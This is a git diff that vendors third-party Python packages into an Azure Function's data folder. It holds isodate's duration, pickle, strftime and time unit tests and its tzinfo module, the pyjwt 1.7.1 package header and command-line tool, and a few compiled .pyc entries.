+        # self.assertNotEqual(-timedelta(days=10), -Duration(days=10))
+
+    def test_format(self):
+        '''
+        Test various other strftime combinations.
+        '''
+        self.assertEqual(duration_isoformat(Duration(0)), 'P0D')
+        self.assertEqual(duration_isoformat(-Duration(0)), 'P0D')
+        self.assertEqual(duration_isoformat(Duration(seconds=10)), 'PT10S')
+        self.assertEqual(duration_isoformat(Duration(years=-1, months=-1)),
+                         '-P1Y1M')
+        self.assertEqual(duration_isoformat(-Duration(years=1, months=1)),
+                         '-P1Y1M')
+        self.assertEqual(duration_isoformat(-Duration(years=-1, months=-1)),
+                         'P1Y1M')
+        self.assertEqual(duration_isoformat(-Duration(years=-1, months=-1)),
+                         'P1Y1M')
+        dur = Duration(years=3, months=7, days=23, hours=5, minutes=25,
+                       milliseconds=330)
+        self.assertEqual(duration_isoformat(dur), 'P3Y7M23DT5H25M0.33S')
+        self.assertEqual(duration_isoformat(-dur), '-P3Y7M23DT5H25M0.33S')
+
+    def test_equal(self):
+        '''
+        Test __eq__ and __ne__ methods.
+        '''
+        self.assertEqual(Duration(years=1, months=1),
+                         Duration(years=1, months=1))
+        self.assertEqual(Duration(years=1, months=1), Duration(months=13))
+        self.assertNotEqual(Duration(years=1, months=2),
+                            Duration(years=1, months=1))
+        self.assertNotEqual(Duration(years=1, months=1), Duration(months=14))
+        self.assertNotEqual(Duration(years=1), timedelta(days=365))
+        self.assertFalse(Duration(years=1, months=1) !=
+                         Duration(years=1, months=1))
+        self.assertFalse(Duration(years=1, months=1) != Duration(months=13))
+        self.assertTrue(Duration(years=1, months=2) !=
+                        Duration(years=1, months=1))
+        self.assertTrue(Duration(years=1, months=1) != Duration(months=14))
+        self.assertTrue(Duration(years=1) != timedelta(days=365))
+        self.assertEqual(Duration(days=1), timedelta(days=1))
+        # FIXME: this test fails in python 3... it seems like python3
+        # treats a != b the same b != a
+        # self.assertNotEqual(timedelta(days=1), Duration(days=1))
+
+    def test_totimedelta(self):
+        '''
+        Test conversion from Duration to timedelta.
+        '''
+        dur = Duration(years=1, months=2, days=10)
+        self.assertEqual(dur.totimedelta(datetime(1998, 2, 25)),
+                         timedelta(434))
+        # leap year has one day more in february
+        self.assertEqual(dur.totimedelta(datetime(2000, 2, 25)),
+                         timedelta(435))
+        dur = Duration(months=2)
+        # two months starting in March span March and April (61 days),
+        # while two months starting in February span February and March
+        # (59 days, or 60 in a leap year)
+        self.assertEqual(dur.totimedelta(datetime(2000, 2, 25)), timedelta(60))
+        self.assertEqual(dur.totimedelta(datetime(2001, 2, 25)), timedelta(59))
+        self.assertEqual(dur.totimedelta(datetime(2001, 3, 25)), timedelta(61))
+
+
+def create_parsetestcase(durationstring, expectation, format, altstr):
+    """
+    Create a TestCase class for a specific test.
+
+    This allows having a separate TestCase for each test tuple from the
+    PARSE_TEST_CASES list, so that a failed test won't stop other tests.
+    """
+
+    class TestParseDuration(unittest.TestCase):
+        '''
+        A test case template to parse an ISO duration string into a
+        timedelta or Duration object.
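+        For example, 'P1DT12H' parses to timedelta(days=1, hours=12).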
+        '''
+
+        def test_parse(self):
+            '''
+            Parse an ISO duration string and compare it to the expected value.
+            '''
+            result = parse_duration(durationstring)
+            self.assertEqual(result, expectation)
+
+        def test_format(self):
+            '''
+            Take duration/timedelta object and create ISO string from it.
+            This is the reverse test to test_parse.
+            '''
+            if altstr:
+                self.assertEqual(duration_isoformat(expectation, format),
+                                 altstr)
+            else:
+                # if durationstring == '-P2W':
+                # import pdb; pdb.set_trace()
+                self.assertEqual(duration_isoformat(expectation, format),
+                                 durationstring)
+
+    return unittest.TestLoader().loadTestsFromTestCase(TestParseDuration)
+
+
+def create_mathtestcase(dur1, dur2, resadd, ressub, resge):
+    """
+    Create a TestCase class for a specific test.
+
+    This allows having a separate TestCase for each test tuple from the
+    MATH_TEST_CASES list, so that a failed test won't stop other tests.
+    """
+
+    dur1 = parse_duration(dur1)
+    dur2 = parse_duration(dur2)
+    resadd = parse_duration(resadd)
+    ressub = parse_duration(ressub)
+
+    class TestMathDuration(unittest.TestCase):
+        '''
+        A test case template to test the addition, subtraction and >
+        operators for Duration objects.
+        '''
+
+        def test_add(self):
+            '''
+            Test operator + (__add__, __radd__)
+            '''
+            self.assertEqual(dur1 + dur2, resadd)
+
+        def test_sub(self):
+            '''
+            Test operator - (__sub__, __rsub__)
+            '''
+            self.assertEqual(dur1 - dur2, ressub)
+
+        def test_ge(self):
+            '''
+            Test operator > and <
+            '''
+            def dogetest():
+                ''' Test greater than.'''
+                return dur1 > dur2
+
+            def doletest():
+                ''' Test less than.'''
+                return dur1 < dur2
+            if resge is None:
+                self.assertRaises(TypeError, dogetest)
+                self.assertRaises(TypeError, doletest)
+            else:
+                self.assertEqual(dogetest(), resge)
+                self.assertEqual(doletest(), not resge)
+
+    return unittest.TestLoader().loadTestsFromTestCase(TestMathDuration)
+
+
+def create_datetestcase(start, tdelta, duration):
+    """
+    Create a TestCase class for a specific test.
+
+    This allows having a separate TestCase for each test tuple from the
+    DATE_TEST_CASES list, so that a failed test won't stop other tests.
+    """
+
+    class TestDateCalc(unittest.TestCase):
+        '''
+        A test case template to test the addition and subtraction
+        operators for Duration objects.
+        '''
+
+        def test_add(self):
+            '''
+            Test operator +.
+            '''
+            self.assertEqual(start + tdelta, start + duration)
+
+        def test_sub(self):
+            '''
+            Test operator -.
+            '''
+            self.assertEqual(start - tdelta, start - duration)
+
+    return unittest.TestLoader().loadTestsFromTestCase(TestDateCalc)
+
+
+def create_datecalctestcase(start, duration, expectation):
+    """
+    Create a TestCase class for a specific test.
+
+    This allows having a separate TestCase for each test tuple from the
+    DATE_CALC_TEST_CASES list, so that a failed test won't stop other tests.
+    """
+
+    class TestDateCalc(unittest.TestCase):
+        '''
+        A test case template to test the addition operator for Duration
+        objects.
+        '''
+
+        def test_calc(self):
+            '''
+            Test operator +.
+            '''
+            if expectation is None:
+                self.assertRaises(ValueError, operator.add, start, duration)
+            else:
+                self.assertEqual(start + duration, expectation)
+
+    return unittest.TestLoader().loadTestsFromTestCase(TestDateCalc)
+
+
+def create_datemultestcase(operand1, operand2, expectation):
+    """
+    Create a TestCase class for a specific test.
+
+    This allows having a separate TestCase for each test tuple from the
+    DATE_MUL_TEST_CASES list, so that a failed test won't stop other tests.
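+    For example, Duration(years=1, months=1) * 3 is expected to equal
+    Duration(years=3, months=3).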
+ """ + + class TestDateMul(unittest.TestCase): + ''' + A test case template test addition operators for Duration objects. + ''' + + def test_mul(self): + ''' + Test operator *. + ''' + self.assertEqual(operand1 * operand2, expectation) + + return unittest.TestLoader().loadTestsFromTestCase(TestDateMul) + + +def test_suite(): + ''' + Return a test suite containing all test defined above. + ''' + suite = unittest.TestSuite() + for durationstring, (expectation, format, + altstr) in PARSE_TEST_CASES.items(): + suite.addTest(create_parsetestcase(durationstring, expectation, + format, altstr)) + for testdata in MATH_TEST_CASES: + suite.addTest(create_mathtestcase(*testdata)) + for testdata in DATE_TEST_CASES: + suite.addTest(create_datetestcase(*testdata)) + for testdata in DATE_CALC_TEST_CASES: + suite.addTest(create_datecalctestcase(*testdata)) + for testdata in DATE_MUL_TEST_CASES: + suite.addTest(create_datemultestcase(*testdata)) + suite.addTest(unittest.TestLoader().loadTestsFromTestCase(DurationTest)) + return suite + + +# load_tests Protocol +def load_tests(loader, tests, pattern): + return test_suite() + + +if __name__ == '__main__': + unittest.main(defaultTest='test_suite') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_pickle.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_pickle.py new file mode 100644 index 0000000..66e29a8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_pickle.py @@ -0,0 +1,63 @@ +import unittest + +from six.moves import cPickle as pickle + +import isodate + + +class TestPickle(unittest.TestCase): + ''' + A test case template to parse an ISO datetime string into a + datetime object. + ''' + + def test_pickle_datetime(self): + ''' + Parse an ISO datetime string and compare it to the expected value. + ''' + dti = isodate.parse_datetime('2012-10-26T09:33+00:00') + for proto in range(0, pickle.HIGHEST_PROTOCOL + 1): + pikl = pickle.dumps(dti, proto) + self.assertEqual(dti, pickle.loads(pikl), + "pickle proto %d failed" % proto) + + def test_pickle_duration(self): + ''' + Pickle / unpickle duration objects. + ''' + from isodate.duration import Duration + dur = Duration() + failed = [] + for proto in range(0, pickle.HIGHEST_PROTOCOL + 1): + try: + pikl = pickle.dumps(dur, proto) + if dur != pickle.loads(pikl): + raise Exception("not equal") + except Exception as e: + failed.append("pickle proto %d failed (%s)" % (proto, repr(e))) + self.assertEqual(len(failed), 0, "pickle protos failed: %s" % + str(failed)) + + def test_pickle_utc(self): + ''' + isodate.UTC objects remain the same after pickling. + ''' + self.assertTrue(isodate.UTC is pickle.loads(pickle.dumps(isodate.UTC))) + + +def test_suite(): + ''' + Construct a TestSuite instance for all test cases. 
+ ''' + suite = unittest.TestSuite() + suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestPickle)) + return suite + + +# load_tests Protocol +def load_tests(loader, tests, pattern): + return test_suite() + + +if __name__ == '__main__': + unittest.main(defaultTest='test_suite') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_strf.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_strf.py new file mode 100644 index 0000000..5b7b709 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_strf.py @@ -0,0 +1,136 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +Test cases for the isodate module. +''' +import unittest +import time +from datetime import datetime, timedelta +from isodate import strftime +from isodate import LOCAL +from isodate import DT_EXT_COMPLETE +from isodate import tzinfo + + +TEST_CASES = ((datetime(2012, 12, 25, 13, 30, 0, 0, LOCAL), DT_EXT_COMPLETE, + "2012-12-25T13:30:00+10:00"), + # DST ON + (datetime(1999, 12, 25, 13, 30, 0, 0, LOCAL), DT_EXT_COMPLETE, + "1999-12-25T13:30:00+11:00"), + # microseconds + (datetime(2012, 10, 12, 8, 29, 46, 69178), + "%Y-%m-%dT%H:%M:%S.%f", + "2012-10-12T08:29:46.069178"), + (datetime(2012, 10, 12, 8, 29, 46, 691780), + "%Y-%m-%dT%H:%M:%S.%f", + "2012-10-12T08:29:46.691780"), + ) + + +def create_testcase(dt, format, expectation): + """ + Create a TestCase class for a specific test. + + This allows having a separate TestCase for each test tuple from the + TEST_CASES list, so that a failed test won't stop other tests. + """ + + class TestDate(unittest.TestCase): + ''' + A test case template to test ISO date formatting. 
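+        For example, with the +10:00 zone mocked below,
+        strftime(datetime(2012, 12, 25, 13, 30, 0, 0, LOCAL), DT_EXT_COMPLETE)
+        yields '2012-12-25T13:30:00+10:00'.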
+        '''
+
+        # local time zone mock function
+        def localtime_mock(self, secs):
+            """
+            Mock time.localtime so that it returns a time_struct with
+            tm_isdst set deterministically: DST on before 2000, off after.
+            """
+            tt = self.ORIG['localtime'](secs)
+            # before 2000 everything is dst, after 2000 no dst.
+            if tt.tm_year < 2000:
+                dst = 1
+            else:
+                dst = 0
+            tt = (tt.tm_year, tt.tm_mon, tt.tm_mday,
+                  tt.tm_hour, tt.tm_min, tt.tm_sec,
+                  tt.tm_wday, tt.tm_yday, dst)
+            return time.struct_time(tt)
+
+        def setUp(self):
+            self.ORIG = {}
+            self.ORIG['STDOFFSET'] = tzinfo.STDOFFSET
+            self.ORIG['DSTOFFSET'] = tzinfo.DSTOFFSET
+            self.ORIG['DSTDIFF'] = tzinfo.DSTDIFF
+            self.ORIG['localtime'] = time.localtime
+            # override all saved values with fixtures.
+            # set a fixed LOCAL TZ offset, so that this test runs the same in
+            # every time zone
+            tzinfo.STDOFFSET = timedelta(seconds=36000)  # assume LOC = +10:00
+            tzinfo.DSTOFFSET = timedelta(seconds=39600)  # assume DST = +11:00
+            tzinfo.DSTDIFF = tzinfo.DSTOFFSET - tzinfo.STDOFFSET
+            time.localtime = self.localtime_mock
+
+        def tearDown(self):
+            # restore test fixtures
+            tzinfo.STDOFFSET = self.ORIG['STDOFFSET']
+            tzinfo.DSTOFFSET = self.ORIG['DSTOFFSET']
+            tzinfo.DSTDIFF = self.ORIG['DSTDIFF']
+            time.localtime = self.ORIG['localtime']
+
+        def test_format(self):
+            '''
+            Take date object and create ISO string from it.
+            This is the reverse test to test_parse.
+            '''
+            if expectation is None:
+                self.assertRaises(AttributeError,
+                                  strftime, dt, format)
+            else:
+                self.assertEqual(strftime(dt, format),
+                                 expectation)
+
+    return unittest.TestLoader().loadTestsFromTestCase(TestDate)
+
+
+def test_suite():
+    '''
+    Construct a TestSuite instance for all test cases.
+    '''
+    suite = unittest.TestSuite()
+    for dt, format, expectation in TEST_CASES:
+        suite.addTest(create_testcase(dt, format, expectation))
+    return suite
+
+
+# load_tests Protocol
+def load_tests(loader, tests, pattern):
+    return test_suite()
+
+
+if __name__ == '__main__':
+    unittest.main(defaultTest='test_suite')
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_time.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_time.py
new file mode 100644
index 0000000..75b2de9
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_time.py
@@ -0,0 +1,150 @@
+##############################################################################
+# Copyright 2009, Gerhard Weis
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#
+# * Redistributions of source code must retain the above copyright notice,
+#   this list of conditions and the following disclaimer.
+# * Redistributions in binary form must reproduce the above copyright notice,
+#   this list of conditions and the following disclaimer in the documentation
+#   and/or other materials provided with the distribution.
+# * Neither the name of the authors nor the names of its contributors
+#   may be used to endorse or promote products derived from this software
+#   without specific prior written permission.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED.
IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +Test cases for the isotime module. +''' +import unittest +from datetime import time + +from isodate import parse_time, UTC, FixedOffset, ISO8601Error, time_isoformat +from isodate import TIME_BAS_COMPLETE, TIME_BAS_MINUTE +from isodate import TIME_EXT_COMPLETE, TIME_EXT_MINUTE +from isodate import TIME_HOUR +from isodate import TZ_BAS, TZ_EXT, TZ_HOUR + +# the following list contains tuples of ISO time strings and the expected +# result from the parse_time method. A result of None means an ISO8601Error +# is expected. +TEST_CASES = [('232050', time(23, 20, 50), TIME_BAS_COMPLETE + TZ_BAS), + ('23:20:50', time(23, 20, 50), TIME_EXT_COMPLETE + TZ_EXT), + ('2320', time(23, 20), TIME_BAS_MINUTE), + ('23:20', time(23, 20), TIME_EXT_MINUTE), + ('23', time(23), TIME_HOUR), + ('232050,5', time(23, 20, 50, 500000), None), + ('23:20:50.5', time(23, 20, 50, 500000), None), + # test precision + ('15:33:42.123456', time(15, 33, 42, 123456), None), + ('15:33:42.1234564', time(15, 33, 42, 123456), None), + ('15:33:42.1234557', time(15, 33, 42, 123456), None), + ('2320,8', time(23, 20, 48), None), + ('23:20,8', time(23, 20, 48), None), + ('23,3', time(23, 18), None), + ('232030Z', time(23, 20, 30, tzinfo=UTC), + TIME_BAS_COMPLETE + TZ_BAS), + ('2320Z', time(23, 20, tzinfo=UTC), TIME_BAS_MINUTE + TZ_BAS), + ('23Z', time(23, tzinfo=UTC), TIME_HOUR + TZ_BAS), + ('23:20:30Z', time(23, 20, 30, tzinfo=UTC), + TIME_EXT_COMPLETE + TZ_EXT), + ('23:20Z', time(23, 20, tzinfo=UTC), TIME_EXT_MINUTE + TZ_EXT), + ('152746+0100', time(15, 27, 46, + tzinfo=FixedOffset(1, 0, '+0100')), TIME_BAS_COMPLETE + TZ_BAS), + ('152746-0500', time(15, 27, 46, + tzinfo=FixedOffset(-5, 0, '-0500')), + TIME_BAS_COMPLETE + TZ_BAS), + ('152746+01', time(15, 27, 46, + tzinfo=FixedOffset(1, 0, '+01:00')), + TIME_BAS_COMPLETE + TZ_HOUR), + ('152746-05', time(15, 27, 46, + tzinfo=FixedOffset(-5, -0, '-05:00')), + TIME_BAS_COMPLETE + TZ_HOUR), + ('15:27:46+01:00', time(15, 27, 46, + tzinfo=FixedOffset(1, 0, '+01:00')), + TIME_EXT_COMPLETE + TZ_EXT), + ('15:27:46-05:00', time(15, 27, 46, + tzinfo=FixedOffset(-5, -0, '-05:00')), + TIME_EXT_COMPLETE + TZ_EXT), + ('15:27:46+01', time(15, 27, 46, + tzinfo=FixedOffset(1, 0, '+01:00')), + TIME_EXT_COMPLETE + TZ_HOUR), + ('15:27:46-05', time(15, 27, 46, + tzinfo=FixedOffset(-5, -0, '-05:00')), + TIME_EXT_COMPLETE + TZ_HOUR), + ('15:27:46-05:30', time(15, 27, 46, + tzinfo=FixedOffset(-5, -30, '-05:30')), + TIME_EXT_COMPLETE + TZ_EXT), + ('15:27:46-0545', time(15, 27, 46, + tzinfo=FixedOffset(-5, -45, '-0545')), + TIME_EXT_COMPLETE + TZ_BAS), + ('1:17:30', None, TIME_EXT_COMPLETE)] + + +def create_testcase(timestring, expectation, format): + """ + Create a TestCase class for a specific test. + + This allows having a separate TestCase for each test tuple from the + TEST_CASES list, so that a failed test won't stop other tests. + """ + + class TestTime(unittest.TestCase): + ''' + A test case template to parse an ISO time string into a time + object. 
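+        For example, '23:20:50' parses to time(23, 20, 50).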
+        '''
+
+        def test_parse(self):
+            '''
+            Parse an ISO time string and compare it to the expected value.
+            '''
+            if expectation is None:
+                self.assertRaises(ISO8601Error, parse_time, timestring)
+            else:
+                result = parse_time(timestring)
+                self.assertEqual(result, expectation)
+
+        def test_format(self):
+            '''
+            Take time object and create ISO string from it.
+            This is the reverse test to test_parse.
+            '''
+            if expectation is None:
+                self.assertRaises(AttributeError,
+                                  time_isoformat, expectation, format)
+            elif format is not None:
+                self.assertEqual(time_isoformat(expectation, format),
+                                 timestring)
+
+    return unittest.TestLoader().loadTestsFromTestCase(TestTime)
+
+
+def test_suite():
+    '''
+    Construct a TestSuite instance for all test cases.
+    '''
+    suite = unittest.TestSuite()
+    for timestring, expectation, format in TEST_CASES:
+        suite.addTest(create_testcase(timestring, expectation, format))
+    return suite
+
+
+# load_tests Protocol
+def load_tests(loader, tests, pattern):
+    return test_suite()
+
+
+if __name__ == '__main__':
+    unittest.main(defaultTest='test_suite')
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tzinfo.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tzinfo.py
new file mode 100644
index 0000000..b1dd01a
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tzinfo.py
@@ -0,0 +1,157 @@
+'''
+This module provides some datetime.tzinfo implementations.
+
+All those classes are taken from the Python documentation.
+'''
+from datetime import timedelta, tzinfo
+import time
+
+ZERO = timedelta(0)
+# constant for zero time offset.
+
+
+class Utc(tzinfo):
+    '''UTC
+
+    Universal time coordinated time zone.
+    '''
+
+    def utcoffset(self, dt):
+        '''
+        Return offset from UTC in minutes east of UTC, which is ZERO for UTC.
+        '''
+        return ZERO
+
+    def tzname(self, dt):
+        '''
+        Return the time zone name corresponding to the datetime object dt,
+        as a string.
+        '''
+        return "UTC"
+
+    def dst(self, dt):
+        '''
+        Return the daylight saving time (DST) adjustment, in minutes east
+        of UTC.
+        '''
+        return ZERO
+
+    def __reduce__(self):
+        '''
+        When unpickling a Utc object, return the default instance below, UTC.
+        '''
+        return _Utc, ()
+
+
+UTC = Utc()
+# the default instance for UTC.
+
+
+def _Utc():
+    '''
+    Helper function for unpickling a Utc object.
+    '''
+    return UTC
+
+
+class FixedOffset(tzinfo):
+    '''
+    A class building tzinfo objects for fixed-offset time zones.
+
+    Note that FixedOffset(0, 0, "UTC") or FixedOffset() is a different way to
+    build a UTC tzinfo object.
+    '''
+
+    def __init__(self, offset_hours=0, offset_minutes=0, name="UTC"):
+        '''
+        Initialise an instance with time offset and name.
+        The time offset should be positive for time zones east of UTC
+        and negative for time zones west of UTC.
+        '''
+        self.__offset = timedelta(hours=offset_hours, minutes=offset_minutes)
+        self.__name = name
+
+    def utcoffset(self, dt):
+        '''
+        Return offset from UTC in minutes east of UTC.
+        '''
+        return self.__offset
+
+    def tzname(self, dt):
+        '''
+        Return the time zone name corresponding to the datetime object dt, as a
+        string.
+        '''
+        return self.__name
+
+    def dst(self, dt):
+        '''
+        Return the daylight saving time (DST) adjustment, in minutes east of
+        UTC.
+        '''
+        return ZERO
+
+    def __repr__(self):
+        '''
+        Return nicely formatted repr string.
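+        For example, repr(FixedOffset(1, 0, '+01:00')) gives
+        "<FixedOffset '+01:00'>".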
+        '''
+        return "<FixedOffset %r>" % self.__name
+
+
+STDOFFSET = timedelta(seconds=-time.timezone)
+# local time zone offset
+
+# calculate local daylight saving offset if any.
+if time.daylight:
+    DSTOFFSET = timedelta(seconds=-time.altzone)
+else:
+    DSTOFFSET = STDOFFSET
+
+DSTDIFF = DSTOFFSET - STDOFFSET
+# difference between local time zone and local DST time zone
+
+
+class LocalTimezone(tzinfo):
+    """
+    A class capturing the platform's idea of local time.
+    """
+
+    def utcoffset(self, dt):
+        '''
+        Return offset from UTC in minutes east of UTC.
+        '''
+        if self._isdst(dt):
+            return DSTOFFSET
+        else:
+            return STDOFFSET
+
+    def dst(self, dt):
+        '''
+        Return daylight saving offset.
+        '''
+        if self._isdst(dt):
+            return DSTDIFF
+        else:
+            return ZERO
+
+    def tzname(self, dt):
+        '''
+        Return the time zone name corresponding to the datetime object dt, as a
+        string.
+        '''
+        return time.tzname[self._isdst(dt)]
+
+    def _isdst(self, dt):
+        '''
+        Returns true if DST is active for given datetime object dt.
+        '''
+        tt = (dt.year, dt.month, dt.day,
+              dt.hour, dt.minute, dt.second,
+              dt.weekday(), 0, -1)
+        stamp = time.mktime(tt)
+        tt = time.localtime(stamp)
+        return tt.tm_isdst > 0
+
+
+# the default instance for local time zone.
+LOCAL = LocalTimezone()
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__init__.py
new file mode 100644
index 0000000..6122f8d
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__init__.py
@@ -0,0 +1,31 @@
+# -*- coding: utf-8 -*-
+# flake8: noqa
+
+"""
+JSON Web Token implementation
+
+Minimum implementation based on this spec:
+http://self-issued.info/docs/draft-jones-json-web-token-01.html
+"""
+
+
+__title__ = 'pyjwt'
+__version__ = '1.7.1'
+__author__ = 'José Padilla'
+__license__ = 'MIT'
+__copyright__ = 'Copyright 2015-2018 José Padilla'
+
+
+from .api_jwt import (
+    encode, decode, register_algorithm, unregister_algorithm,
+    get_unverified_header, PyJWT
+)
+from .api_jws import PyJWS
+from .exceptions import (
+    InvalidTokenError, DecodeError, InvalidAlgorithmError,
+    InvalidAudienceError, ExpiredSignatureError, ImmatureSignatureError,
+    InvalidIssuedAtError, InvalidIssuerError, ExpiredSignature,
+    InvalidAudience, InvalidIssuer, MissingRequiredClaimError,
+    InvalidSignatureError,
+    PyJWTError,
+)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__main__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__main__.py
new file mode 100644
index 0000000..396dc0d
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__main__.py
@@ -0,0 +1,168 @@
+#!/usr/bin/env python
+
+from __future__ import absolute_import, print_function
+
+import argparse
+import json
+import sys
+import time
+
+from . import DecodeError, __version__, decode, encode
+
+
+def encode_payload(args):
+    # Try to encode
+    if args.key is None:
+        raise ValueError('Key is required when encoding. See --help for usage.')
+
+    # Build payload object to encode
+    payload = {}
+
+    for arg in args.payload:
+        k, v = arg.split('=', 1)
+
+        # exp +offset special case?
+        if k == 'exp' and v[0] == '+' and len(v) > 1:
+            v = str(int(time.time()+int(v[1:])))
+
+        # Cast to integer?
+        if v.isdigit():
+            v = int(v)
+        else:
+            # Cast to float?
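+            # (values that are neither int nor float fall through the
+            # ValueError below and stay strings)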
+ try: + v = float(v) + except ValueError: + pass + + # Cast to true, false, or null? + constants = {'true': True, 'false': False, 'null': None} + + if v in constants: + v = constants[v] + + payload[k] = v + + token = encode( + payload, + key=args.key, + algorithm=args.algorithm + ) + + return token.decode('utf-8') + + +def decode_payload(args): + try: + if args.token: + token = args.token + else: + if sys.stdin.isatty(): + token = sys.stdin.readline().strip() + else: + raise IOError('Cannot read from stdin: terminal not a TTY') + + token = token.encode('utf-8') + data = decode(token, key=args.key, verify=args.verify) + + return json.dumps(data) + + except DecodeError as e: + raise DecodeError('There was an error decoding the token: %s' % e) + + +def build_argparser(): + + usage = ''' + Encodes or decodes JSON Web Tokens based on input. + + %(prog)s [options] [options] input + + Decoding examples: + + %(prog)s --key=secret decode json.web.token + %(prog)s decode --no-verify json.web.token + + Encoding requires the key option and takes space separated key/value pairs + separated by equals (=) as input. Examples: + + %(prog)s --key=secret encode iss=me exp=1302049071 + %(prog)s --key=secret encode foo=bar exp=+10 + + The exp key is special and can take an offset to current Unix time. + ''' + + arg_parser = argparse.ArgumentParser( + prog='pyjwt', + usage=usage + ) + + arg_parser.add_argument( + '-v', '--version', + action='version', + version='%(prog)s ' + __version__ + ) + + arg_parser.add_argument( + '--key', + dest='key', + metavar='KEY', + default=None, + help='set the secret key to sign with' + ) + + arg_parser.add_argument( + '--alg', + dest='algorithm', + metavar='ALG', + default='HS256', + help='set crypto algorithm to sign with. default=HS256' + ) + + subparsers = arg_parser.add_subparsers( + title='PyJWT subcommands', + description='valid subcommands', + help='additional help' + ) + + # Encode subcommand + encode_parser = subparsers.add_parser('encode', help='use to encode a supplied payload') + + payload_help = """Payload to encode. 
Must be a space separated list of key/value
+    pairs separated by equals (=) sign."""
+
+    encode_parser.add_argument('payload', nargs='+', help=payload_help)
+    encode_parser.set_defaults(func=encode_payload)
+
+    # Decode subcommand
+    decode_parser = subparsers.add_parser('decode', help='use to decode a supplied JSON web token')
+    decode_parser.add_argument(
+        'token',
+        help='JSON web token to decode.',
+        nargs='?')
+
+    decode_parser.add_argument(
+        '-n', '--no-verify',
+        action='store_false',
+        dest='verify',
+        default=True,
+        help='ignore signature and claims verification on decode'
+    )
+
+    decode_parser.set_defaults(func=decode_payload)
+
+    return arg_parser
+
+
+def main():
+    arg_parser = build_argparser()
+
+    try:
+        arguments = arg_parser.parse_args(sys.argv[1:])
+
+        output = arguments.func(arguments)
+
+        print(output)
+    except Exception as e:
+        print('There was an unforeseen error: ', e)
+        arg_parser.print_help()
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/__init__.cpython-39.pyc
new file mode 100644
index 0000000..218427c
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/__init__.cpython-39.pyc differ
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/__main__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/__main__.cpython-39.pyc
new file mode 100644
index 0000000..3690dba
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/__main__.cpython-39.pyc differ
